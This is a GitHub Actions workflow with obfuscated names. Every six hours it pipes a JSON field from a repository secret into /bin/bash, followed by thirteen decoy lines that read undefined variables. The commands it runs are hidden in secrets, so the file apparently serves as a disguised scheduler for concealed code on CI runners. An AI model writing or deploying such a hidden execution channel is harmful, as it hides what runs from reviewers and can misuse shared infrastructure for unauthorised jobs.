name: huanglongxing1987

on:
  workflow_dispatch:
  schedule:
    - cron: '35 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huanglongxing1987
        env:
          vrg991: ${{ secrets.vrg991 }}
        run: |
          echo $vrg991 | jq -r .uzqrb5 | /bin/bash
          echo $szeok20257 | jq -r .uej58 | /bin/bash
          echo $pc49484 | jq -r .ssvp67389 | /bin/bash
          echo $h87 | jq -r .h353 | /bin/bash
          echo $hlfgm112 | jq -r .yufip92 | /bin/bash
          echo $e359 | jq -r .bmmk081 | /bin/bash
          echo $mwbk81 | jq -r .iyby88279 | /bin/bash
          echo $i204 | jq -r .iknbc6088 | /bin/bash
          echo $t2 | jq -r .ua6 | /bin/bash
          echo $tnql76437 | jq -r .kuc82 | /bin/bash
          echo $x67 | jq -r .bdz81051 | /bin/bash
          echo $f94 | jq -r .uutd62 | /bin/bash
          echo $yeqx571 | jq -r .ib39178 | /bin/bash
          echo $u6 | jq -r .ngaep913 | /bin/bash

